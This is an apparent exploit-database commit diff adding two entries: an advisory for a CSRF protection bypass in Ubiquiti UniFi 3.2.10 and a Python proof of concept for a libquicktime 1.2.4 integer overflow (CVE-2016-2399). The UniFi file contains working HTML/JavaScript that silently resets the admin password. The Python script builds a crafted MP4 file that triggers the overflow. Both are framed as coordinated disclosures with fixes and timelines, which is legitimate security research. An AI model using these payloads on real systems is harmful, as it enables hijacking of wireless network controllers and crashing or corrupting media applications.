DB: 2016-02-24

2 new exploits
2016-02-24 05:02:18 +00:00 · 2016-02-24 05:02:18 +00:00 · 4ffbeca63b
commit 4ffbeca63b
parent f7b6199767
3 changed files with 211 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35723,3 +35723,5 @@ id,file,description,date,author,platform,type,port
 39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
 39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0
 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443
--- a/platforms/json/webapps/39488.txt
+++ b/platforms/json/webapps/39488.txt
@ -0,0 +1,104 @@
 RCE Security Advisory
 https://www.rcesecurity.com
 1. ADVISORY INFORMATION
 -----------------------
 Product:        Ubiquiti Networks UniFi
 Vendor URL:     www.ubnt.com
 Type:           Cross-Site Request Forgery [CWE-353]
 Date found:     2015-03-19
 Date published: 2016-02-23
 CVSSv3 Score:   6.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)
 CVE:            -
 2. CREDITS
 ----------
 This vulnerability was discovered and researched by Julien Ahrens from
 RCE Security.
 3. VERSIONS AFFECTED
 --------------------
 UniFi v3.2.10
 older versions may be affected too.
 4. INTRODUCTION
 ---------------
 The UniFi® Controller software is a powerful, enterprise wireless software 
 engine ideal for high-density client deployments requiring low latency and 
 high uptime performance. A single UniFi Controller running in the cloud 
 can manage multiple sites: multiple, distributed deployments and 
 multi-tenancy for managed service providers.
 (from the vendor's homepage)
 5. VULNERABILITY DESCRIPTION
 ----------------------------
 A generic Cross-Site Request Forgery protection bypass vulnerability was
 identified in UniFi v3.2.10 and prior.
 The application uses a CSRF protection, which is based on verifying the
 Referer header, but does not catch the case where the Referer header
 is completely missing. 
 This leads to a generic CSRF protection bypass, resulting in all 
 application specific functionalities becoming vulnerable. An attacker needs 
 to trick the victim to visit an arbitrary website in order to exploit the 
 vulnerability. Successful exploits can allow the attacker to compromise the
 whole application including connected devices, e.g. by changing passwords
 of users, adding new users, changing device usernames and passwords or by 
 creating new WLAN configurations.
 6. PROOF-OF-CONCEPT
 -------------------
 The following PoC changes the password of the user "admin" to "csrfpwd":
 <html>
 <head>
 <script>
 function load() {
    var postdata = '<form id=csrf method=POST enctype=\'text\/plain\' action=\'https://127.0.0.1:8443/api/s/default/cmd/sitemgr\'>' +
                    '<input type=hidden name=\'json=%7B%22name%22%3A%22admin%22%2C%22x_password%22%3A%22csrfpwd%22%2C%22email%22%3A%22info%40mail.com%22%2C%22lang%22%3A%22en_US%22%2C%22cmd%22%3A%22set-self%22%7D\' value=\'\' />' +
                    '</form>';
    top.frames[0].document.body.innerHTML=postdata;
    top.frames[0].document.getElementById('csrf').submit();
 }
 </script>
 </head>
 <body onload="load()">
 <iframe src="about:blank" id="noreferer">< /iframe>
 </body>
 </html>
 7. SOLUTION
 -----------
 Upgrade to UniFi v4.7.5 or later
 8. REPORT TIMELINE
 ------------------
 2015-03-19: Discovery of the vulnerability
 2015-03-10: Reported via Ubiquiti's Bug Bounty program (hackerone.com)
 2015-06-02: Vendor apologizes his backlog
 2015-09-28: Asking for status update via HackerOne 
 2015-09-28: Vendor asks to test against version 4.7.5
 2015-10-02: Verified working fix for v4.7.5
 2015-10-23: Vendor changes status to "Resolved"
 2015-11-24: Asking for coordinated disclosure via email
 2015-12-08: No response from vendor
 2015-12-08: Requested public disclosure on HackerOne
 2016-01-08: Report is published automatically
 2016-02-23: Advisory released
 9. REFERENCES
 -------------
 https://www.rcesecurity.com/2016/02/ubiquiti-bug-bounty-unifi-v3-2-10-generic-csrf-protection-bypass
 https://hackerone.com/reports/52635
--- a/platforms/multiple/dos/39487.py
+++ b/platforms/multiple/dos/39487.py
@ -0,0 +1,105 @@
 #!/usr/bin/env python
 #
 ###
 # - 7 February 2016 -
 # My last bug hunting session (*for fun and no-profit*) 
 # has been dedicated to libquicktime
 ###
 # 
 # Author: Marco Romano - @nemux_ http://www.nemux.org
 # libquicktime 1.2.4 Integer Overflow
 #
 # Product Page: http://libquicktime.sourceforge.net/
 # Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
 # Affected products: All products using libquicktime version <= 1.2.4
 #
 # CVE-ID: CVE-2016-2399 
 #
 # Disclosure part: http://www.nemux.org
 #
 ########
 ####### Timeline
 #
 # 07 Feb 2016 Bug discovered
 # 17 Feb 2016 Mitre.org contacted
 # 17 Feb 2016 Disclosed to the project's maintainer
 # 23 Feb 2016 No response from the maintainer
 # 23 Feb 2016 Publicly disclosed 
 #
 ########
 ####### References
 #
 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
 # http://libquicktime.sourceforge.net/
 # http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html 
 # https://en.wikipedia.org/wiki/QuickTime\_File\_Format
 #
 #######
 #
 # DISCLAIMER: It's just a PoC... it will crash something
 #
 #### 
 import sys
 import struct
 import binascii
 """
 There needs to be an mp4 file with these nested atoms to trigger the bug:
 moov -> trak -> mdia -> hdlr
 """
 hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1" 
             "6D6F6F76"               #### moov atom
             "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000" 
             "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
             "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
             "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000" 
             "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000" 
             "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF" 
             "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
             "7472616B"               #### trak atom
             "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
             "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
             "6D646961"               #### mdia atom
             "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
             "4E"                     #### hdlr atom length
             "68646C72"               #### hdlr atom
             "0000000000"
             "4141414141414141"       #### our airstrip :)
             "0000000000000000000000" 
             "EC"                     #### 236 > 127 <-- overflow here and a change in signedness too
             "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
 hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))
 def createPoC():
    try:
        with open("./nemux.mp4","wb") as output:
            output.write(hax0r_mp4)
        print "[*] The PoC is done!"
    except Exception,e: 
        print str(e)
        print "[*] mmmm!"
 def usage():
    print "\nUsage? Run it -> " + sys.argv[0]
    print "this poc creates an mp4 file named nemux.mp4"
    print "--------------------------------------------"
    print "This dummy help? " + sys.argv[0] + " help\n" 
    sys.exit()
 if __name__ == "__main__":
    try:
        if len(sys.argv) == 2:
            usage()
        else:
            print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n"
            print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
            createPoC();
    except Exception,e: 
        print str(e)
        print "Ok... Something went wrong..."
        sys.exit()